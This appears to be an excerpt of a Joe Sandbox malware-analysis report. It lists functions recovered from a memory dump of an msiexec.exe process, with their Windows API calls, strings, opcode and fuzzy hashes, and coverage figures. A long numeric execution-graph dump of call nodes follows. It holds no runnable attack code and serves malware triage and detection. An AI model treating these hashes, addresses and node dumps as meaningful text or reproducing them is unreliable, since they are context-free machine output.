                                                                            • Opcode Fuzzy Hash: ae0eaa24ddf3e628303f3596d618aaeec523fe9b926b3319366f7a57273f4731
                                                                            • Instruction Fuzzy Hash: B9519F71D0460AABDB11AFA8E844FEEBBF8EF97314F140499E50CA7291D735DA01CB61
                                                                            APIs
                                                                            • _free.LIBCMT ref: 235F655C
                                                                              • Part of subcall function 235F62BC: IsProcessorFeaturePresent.KERNEL32(00000017,235F62AB,00000000,?,?,?,?,00000016,?,?,235F62B8,00000000,00000000,00000000,00000000,00000000), ref: 235F62BE
                                                                              • Part of subcall function 235F62BC: GetCurrentProcess.KERNEL32(C0000417), ref: 235F62E0
                                                                              • Part of subcall function 235F62BC: TerminateProcess.KERNEL32(00000000), ref: 235F62E7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                            • String ID: *?$.$[nk/
                                                                            • API String ID: 2667617558-3326510684
                                                                            • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                            • Instruction ID: 2b4bb2d16fd583af200b0e7189d46647d4898c5f57cfe880540613f97fda3608
                                                                            • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                            • Instruction Fuzzy Hash: CB51A375E0020AEFDF14DFA8D880AADBBF9FF99314F2481A9D458E7345E635DA018B50
                                                                            APIs
                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\System32\msiexec.exe,00000104), ref: 235F4C1D
                                                                            • _free.LIBCMT ref: 235F4CE8
                                                                            • _free.LIBCMT ref: 235F4CF2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _free$FileModuleName
                                                                            • String ID: C:\Windows\System32\msiexec.exe
                                                                            • API String ID: 2506810119-1382325751
                                                                            • Opcode ID: 947d26d0b863180e35d60e930c95d5fe3859f3d572d81a817b7ef1cb52ba07e0
                                                                            • Instruction ID: 9c2a6bffcb0da07b8d5ce069ce7a6cfdf87e9d3f97a441c3a326a4c8b37eb6cb
                                                                            • Opcode Fuzzy Hash: 947d26d0b863180e35d60e930c95d5fe3859f3d572d81a817b7ef1cb52ba07e0
                                                                            • Instruction Fuzzy Hash: 7E3152B1B04318AFDB21EF99A985D9EBBFCFB96714B2440D6E90897200D675CA41CB60
                                                                            APIs
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,?,00000000,?,?,235F9C54,?,00000000,?), ref: 235F99A8
                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,235F9C54,?,00000000,?,00000000,00000000,?,00000000), ref: 235F99D6
                                                                            • GetLastError.KERNEL32(?,235F9C54,?,00000000,?,00000000,00000000,?,00000000), ref: 235F9A07
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                            • String ID: [nk/
                                                                            • API String ID: 2456169464-416449849
                                                                            • Opcode ID: 1a92652a348850a7df68e916c2d516b45be5a0a63b29b25f07958727582a9258
                                                                            • Instruction ID: 4058d672083dfa0278f092c34bcc635f505c98784c106efcaed8bcefbab5d0ca
                                                                            • Opcode Fuzzy Hash: 1a92652a348850a7df68e916c2d516b45be5a0a63b29b25f07958727582a9258
                                                                            • Instruction Fuzzy Hash: 53317075A002199FDB24DF29DD819EAB7B8EB49304F1444AEE94AD7250D730AE81CB60
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(235FC7DD), ref: 235FC7E6
                                                                            • GetModuleHandleA.KERNEL32(?,235FC7DD), ref: 235FC838
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 235FC860
                                                                              • Part of subcall function 235FC803: GetProcAddress.KERNEL32(00000000,235FC7F4), ref: 235FC804
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID:
                                                                            • API String ID: 1646373207-0
                                                                            • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                            • Instruction ID: ee9598925292f909e91ca1daab7f1020bb93e608617cb65867cfb3c6e647d104
                                                                            • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                            • Instruction Fuzzy Hash: E101F50098534138EB2166747C01EFA5FEC9B67AA0B181BF6E24DDB193D9A0C506D3FA
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,235F1D66,00000000,00000000,?,235F5C88,235F1D66,00000000,00000000,00000000,?,235F5E85,00000006,FlsSetValue), ref: 235F5D13
                                                                            • GetLastError.KERNEL32(?,235F5C88,235F1D66,00000000,00000000,00000000,?,235F5E85,00000006,FlsSetValue,235FE190,FlsSetValue,00000000,00000364,?,235F5BC8), ref: 235F5D1F
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,235F5C88,235F1D66,00000000,00000000,00000000,?,235F5E85,00000006,FlsSetValue,235FE190,FlsSetValue,00000000), ref: 235F5D2D
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad$ErrorLast
                                                                            • String ID:
                                                                            • API String ID: 3177248105-0
                                                                            • Opcode ID: 1daf49ec6c88f8f70d482644c91656edb5a582fd910cf6b0a3a158ffdc30bba2
                                                                            • Instruction ID: ec0c14ba56b73c7aff9acbe2f79da4e410766d6b916f2e9beec77e75e591a651
                                                                            • Opcode Fuzzy Hash: 1daf49ec6c88f8f70d482644c91656edb5a582fd910cf6b0a3a158ffdc30bba2
                                                                            • Instruction Fuzzy Hash: 9301F736603222ABC3216A68EC4CF463B9CEF077A1B160E61FA0DD7144D724DA02CAE0
                                                                            APIs
                                                                              • Part of subcall function 235F69F3: GetOEMCP.KERNEL32(00000000,?,?,235F6C7C,?), ref: 235F6A1E
                                                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,235F6CC1,?,00000000), ref: 235F6E94
                                                                            • GetCPInfo.KERNEL32(00000000,235F6CC1,?,?,?,235F6CC1,?,00000000), ref: 235F6EA7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: CodeInfoPageValid
                                                                            • String ID: [nk/
                                                                            • API String ID: 546120528-416449849
                                                                            • Opcode ID: 0f29a88bd2dad0de25fa8f9581b32c2a04c92f919797518c9e45d4a7fd3ca5ce
                                                                            • Instruction ID: e3d6cbe8c2aa5e5b6d18297248beebb5cc27c36d81dfdabbc77f8c234a5b2c39
                                                                            • Opcode Fuzzy Hash: 0f29a88bd2dad0de25fa8f9581b32c2a04c92f919797518c9e45d4a7fd3ca5ce
                                                                            • Instruction Fuzzy Hash: 45513070A043459FDB209F31E481AABBBF9EF53304F1885EED18A8B156D735D646CB90
                                                                            APIs
                                                                            • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 235F6AF0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Info
                                                                            • String ID: $[nk/
                                                                            • API String ID: 1807457897-2625282278
                                                                            • Opcode ID: eb8336eba9b16011f251c8ae0b0cab131ec96f2b505ad473c5db31e84511d9ec
                                                                            • Instruction ID: 6e909df5e9f6e32515291f3e29149ec1c268b1d07423e8535d4fb609196e87e3
                                                                            • Opcode Fuzzy Hash: eb8336eba9b16011f251c8ae0b0cab131ec96f2b505ad473c5db31e84511d9ec
                                                                            • Instruction Fuzzy Hash: 7C41E77050438C9ADB218F68DD84EE6BBF9EB56308F1804EDD5CE87142D235AA56CF60
                                                                            APIs
                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,235F9C44,?,00000000,?,00000000,00000000), ref: 235F98B1
                                                                            • GetLastError.KERNEL32(?,235F9C44,?,00000000,?,00000000,00000000,?,00000000), ref: 235F98DA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastWrite
                                                                            • String ID: [nk/
                                                                            • API String ID: 442123175-416449849
                                                                            • Opcode ID: b25a36438740f2d3bdd492d0a02e4235451fbf2de7267d6e08a773875e181b42
                                                                            • Instruction ID: 786ecf7de23b9cc24d3c9cb1911cafe4adf0c595ed88f9cd0d5c9dc740196b62
                                                                            • Opcode Fuzzy Hash: b25a36438740f2d3bdd492d0a02e4235451fbf2de7267d6e08a773875e181b42
                                                                            • Instruction Fuzzy Hash: 88319371A006199BCB24DF59DC809D9B3F9FF99311F2484EAE50ED7250E730E981CB50
                                                                            APIs
                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,235F9C64,?,00000000,?,00000000,00000000), ref: 235F97C3
                                                                            • GetLastError.KERNEL32(?,235F9C64,?,00000000,?,00000000,00000000,?,00000000), ref: 235F97EC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastWrite
                                                                            • String ID: [nk/
                                                                            • API String ID: 442123175-416449849
                                                                            • Opcode ID: 1e742f49fed7745c75f7c31c976bcf2fa6c34c3d2c52ae2be812d3a5a3071f01
                                                                            • Instruction ID: 196106c59b07c09a444fd714bdeca02d519795fdf7f8182b583568bc8b916799
                                                                            • Opcode Fuzzy Hash: 1e742f49fed7745c75f7c31c976bcf2fa6c34c3d2c52ae2be812d3a5a3071f01
                                                                            • Instruction Fuzzy Hash: 2F21B175A013199FCB24DF59D880BD9B3F9FB4A306F1004EAE54AD7251D730EA82CB60
                                                                            APIs
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 235F5CA5
                                                                            • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 235F5CB2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc__crt_fast_encode_pointer
                                                                            • String ID: [nk/
                                                                            • API String ID: 2279764990-416449849
                                                                            • Opcode ID: 7c7484e27e920d2d732de0c4a0343277185f0af3e3f05885a7c44fe499184d98
                                                                            • Instruction ID: fe6b9913da8d090d222484ba87f8893efad7babc61a94eb1c7b7c5fa27b76390
                                                                            • Opcode Fuzzy Hash: 7c7484e27e920d2d732de0c4a0343277185f0af3e3f05885a7c44fe499184d98
                                                                            • Instruction Fuzzy Hash: 4A1120336015219FDB31BD19F94195A73A9EB9232472A0AA0FE1EEB248D734DC0586D1
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _strlen
                                                                            • String ID: : $Se.
                                                                            • API String ID: 4218353326-4089948878
                                                                            • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                            • Instruction ID: 2105a12774acdefb43d88d2c66e9b2c6059efbb6a17efb313575c3412c8da9a4
                                                                            • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                            • Instruction Fuzzy Hash: 3711EBB5A003486EC710DFA8E840BDDFBFCAF5A204F144096E549E7212E6709706C765
                                                                            APIs
                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 235F2B4F
                                                                            • ___raise_securityfailure.LIBCMT ref: 235F2C36
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                            • String ID: [nk/
                                                                            • API String ID: 3761405300-416449849
                                                                            • Opcode ID: 05e7d9ccac975439633c6d171485a2cdec8ebdb70a6b0fdeeb1403f34ddcb646
                                                                            • Instruction ID: 69f07cd0b3c4effa66e92b60ccaa35da422e2c9d7ac668c0f19c2a08f27bc460
                                                                            • Opcode Fuzzy Hash: 05e7d9ccac975439633c6d171485a2cdec8ebdb70a6b0fdeeb1403f34ddcb646
                                                                            • Instruction Fuzzy Hash: 5A21F8B451A3009AD310EF15D683A2077FCFB6871AF38406AE98897398E3B8D581CF45
                                                                            APIs
                                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 235F5F8A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: String
                                                                            • String ID: LCMapStringEx$[nk/
                                                                            • API String ID: 2568140703-2457954262
                                                                            • Opcode ID: 6949e30e1b2e9d640a8d502898ad51ae550116f56a3b991d8e9aa7744d5bf965
                                                                            • Instruction ID: f7208e59e233edceabf3474275a7851db1538e430eb4da7119fb8b7df4e8b8b4
                                                                            • Opcode Fuzzy Hash: 6949e30e1b2e9d640a8d502898ad51ae550116f56a3b991d8e9aa7744d5bf965
                                                                            • Instruction Fuzzy Hash: CA011332500249BBCF22AF91EC00EAE7FB6EF5A710F004594FE1C66124CA36D931AB85
                                                                            APIs
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 235F2903
                                                                              • Part of subcall function 235F35D2: RaiseException.KERNEL32(?,?,?,235F2925,00000000,00000000,00000000,?,?,?,?,?,235F2925,?,236021B8), ref: 235F3632
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 235F2920
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                                            • String ID: Unknown exception
                                                                            • API String ID: 3476068407-410509341
                                                                            • Opcode ID: 4e9baa1778a663fd2beb978ed7342bc0405755e575eb7e14614d437140eda59d
                                                                            • Instruction ID: 833912910590366fd69a402066dfbc588add01bd7272e8ef0f16a1bb0168db05
                                                                            • Opcode Fuzzy Hash: 4e9baa1778a663fd2beb978ed7342bc0405755e575eb7e14614d437140eda59d
                                                                            • Instruction Fuzzy Hash: 19F0FFB8A1430CB7CB04B6A4FC849A937BCAF53650B5081E0AA2CD2095EB30EA1685C0
                                                                            APIs
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 235F5F02
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: CountCriticalInitializeSectionSpin
                                                                            • String ID: InitializeCriticalSectionEx$[nk/
                                                                            • API String ID: 2593887523-2533381023
                                                                            • Opcode ID: be3a4f8f17aacbf73466e3104561f423fb9c330fea9fb6c771c1f51a15623bc0
                                                                            • Instruction ID: ca91579107a8b061cc9557be46ed3159002ea539101a03bfa86424ef5120a0a8
                                                                            • Opcode Fuzzy Hash: be3a4f8f17aacbf73466e3104561f423fb9c330fea9fb6c771c1f51a15623bc0
                                                                            • Instruction Fuzzy Hash: 04F0BE31541108BBCB217F55EC00DAEBFB5EB6A711B0084D5FD1DAA254DB3299119A94
                                                                            APIs
                                                                            • GetOEMCP.KERNEL32(00000000,?,?,235F6C7C,?), ref: 235F6A1E
                                                                            • GetACP.KERNEL32(00000000,?,?,235F6C7C,?), ref: 235F6A35
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: |l_#
                                                                            • API String ID: 0-3726951061
                                                                            • Opcode ID: 33d9e1f8022c09268f6460a291a8e7efe9815c76256762fd551a5685f19ba93e
                                                                            • Instruction ID: f17b4e409d772183081773301da25a8c85fa4e54813216fd42087bb121ac27ed
                                                                            • Opcode Fuzzy Hash: 33d9e1f8022c09268f6460a291a8e7efe9815c76256762fd551a5685f19ba93e
                                                                            • Instruction Fuzzy Hash: 22F0AF30504108CBD710EF64D849B6C37F8FB1233AF284784E87C8A1C9EB758946CB40
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Alloc
                                                                            • String ID: FlsAlloc$[nk/
                                                                            • API String ID: 2773662609-2862356477
                                                                            • Opcode ID: dbc2638f76ce9e3fcadd7053f3844479d41b257a9b01d41b248d1c5af8fe3205
                                                                            • Instruction ID: 43cfdfacf53442018896c7c93c51db3356e967dbc45de6e111185054d6362681
                                                                            • Opcode Fuzzy Hash: dbc2638f76ce9e3fcadd7053f3844479d41b257a9b01d41b248d1c5af8fe3205
                                                                            • Instruction Fuzzy Hash: E3E0E53160221C6BD3317B61AC04E6EBBA9DF67711B1105D9FD0ED6205DE259A0285D9
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Free
                                                                            • String ID: FlsFree$[nk/
                                                                            • API String ID: 3978063606-1047291440
                                                                            • Opcode ID: f3cc3e4ddb91ed41337615706cc1d6ddb8dd5b47fa2cb43d4359d11bc3fc1eb1
                                                                            • Instruction ID: 1a00ba676cd9b3451d61216b37c6b17fd73e158aaf22e1fcb2a2a22d4715ff62
                                                                            • Opcode Fuzzy Hash: f3cc3e4ddb91ed41337615706cc1d6ddb8dd5b47fa2cb43d4359d11bc3fc1eb1
                                                                            • Instruction Fuzzy Hash: 88E0E571A02118ABC3217B65AC04D6EFBA4DF67B00B0105D9FD0ED7205DA318E1186D6

                                                                            Execution Graph

                                                                            Execution Coverage:5.8%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:1.3%
                                                                            Total number of Nodes:2000
                                                                            Total number of Limit Nodes:74
                                                                            [execution_graph: interactive call-graph rendering (node addresses, API names per node and caller->callee edges) not reproducible as text; see the original report for the graph]
38262 40b2cc 27 API calls 38261->38262 38263 402cd5 38262->38263 38264 40b2cc 27 API calls 38263->38264 38265 402cf0 38264->38265 38266 40b2cc 27 API calls 38265->38266 38267 402d0b 38266->38267 38268 40b2cc 27 API calls 38267->38268 38269 402d26 38268->38269 38270 40b2cc 27 API calls 38269->38270 38271 402d3e 38270->38271 38272 40b2cc 27 API calls 38271->38272 38273 402d59 38272->38273 38274 40b2cc 27 API calls 38273->38274 38275 402d78 38274->38275 38276 40b2cc 27 API calls 38275->38276 38277 402d93 38276->38277 38278 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38277->38278 38278->38160 38279->38150 38283 40b58d 38280->38283 38282 40b2d1 38282->38225 38284 40b5a4 GetModuleHandleW FindResourceW 38283->38284 38285 40b62e 38283->38285 38286 40b5c2 LoadResource 38284->38286 38288 40b5e7 38284->38288 38285->38282 38287 40b5d0 SizeofResource LockResource 38286->38287 38286->38288 38287->38288 38288->38285 38296 40afcf 38288->38296 38290 40b608 memcpy 38299 40b4d3 memcpy 38290->38299 38292 40b61e 38300 40b3c1 18 API calls 38292->38300 38294 40b626 38301 40b04b 38294->38301 38297 40b04b ??3@YAXPAX 38296->38297 38298 40afd7 ??2@YAPAXI 38297->38298 38298->38290 38299->38292 38300->38294 38302 40b051 ??3@YAXPAX 38301->38302 38303 40b05f 38301->38303 38302->38303 38303->38285 38304->38168 38306 4032c4 38305->38306 38307 40b633 free 38306->38307 38308 403316 38307->38308 38327 44553b 38308->38327 38312 403480 38525 40368c 15 API calls 38312->38525 38314 403489 38315 40b633 free 38314->38315 38316 403495 38315->38316 38316->38170 38317 4033a9 memset memcpy 38318 4033ec wcscmp 38317->38318 38319 40333c 38317->38319 38318->38319 38319->38312 38319->38317 38319->38318 38523 4028e7 11 API calls 38319->38523 38524 40f508 6 API calls 38319->38524 38322 403421 _wcsicmp 38322->38319 38324 444a64 FreeLibrary 38323->38324 38325 444a83 38323->38325 38324->38325 38325->38170 38326->38171 38328 445548 38327->38328 38329 445599 38328->38329 38526 
40c768 38328->38526 38330 4455a8 memset 38329->38330 38338 4457f2 38329->38338 38609 403988 38330->38609 38336 4455e5 38351 445672 38336->38351 38356 44560f 38336->38356 38341 445854 38338->38341 38711 403e2d memset memset memset memset memset 38338->38711 38339 4458bb memset memset 38343 414c2e 14 API calls 38339->38343 38385 4458aa 38341->38385 38734 403c9c memset memset memset memset memset 38341->38734 38342 44595e memset memset 38346 414c2e 14 API calls 38342->38346 38347 4458f9 38343->38347 38345 445a00 memset memset 38757 414c2e 38345->38757 38354 44599c 38346->38354 38355 40b2cc 27 API calls 38347->38355 38348 44558c 38593 444b06 38348->38593 38349 44557a 38349->38348 38804 4136c0 CoTaskMemFree 38349->38804 38620 403fbe memset memset memset memset memset 38351->38620 38364 40b2cc 27 API calls 38354->38364 38365 445909 38355->38365 38367 4087b3 337 API calls 38356->38367 38358 445bca 38366 445c8b memset memset 38358->38366 38422 445cf0 38358->38422 38359 445b38 memset memset memset 38370 445bd4 38359->38370 38371 445b98 38359->38371 38360 445849 38820 40b1ab free free 38360->38820 38379 4459ac 38364->38379 38376 409d1f 6 API calls 38365->38376 38380 414c2e 14 API calls 38366->38380 38377 445621 38367->38377 38368 445585 38805 41366b FreeLibrary 38368->38805 38369 44589f 38821 40b1ab free free 38369->38821 38374 414c2e 14 API calls 38370->38374 38371->38370 38382 445ba2 38371->38382 38372 40b2cc 27 API calls 38384 445a4f 38372->38384 38387 445be2 38374->38387 38375 403335 38522 4452e5 45 API calls 38375->38522 38390 445919 38376->38390 38806 4454bf 20 API calls 38377->38806 38378 445823 38378->38360 38400 4087b3 337 API calls 38378->38400 38391 409d1f 6 API calls 38379->38391 38392 445cc9 38380->38392 38891 4099c6 wcslen 38382->38891 38383 4456b2 38808 40b1ab free free 38383->38808 38770 409d1f wcslen wcslen 38384->38770 38385->38339 38419 44594a 38385->38419 38398 40b2cc 27 API calls 38387->38398 38388 445d3d 38418 40b2cc 27 API calls 38388->38418 38389 
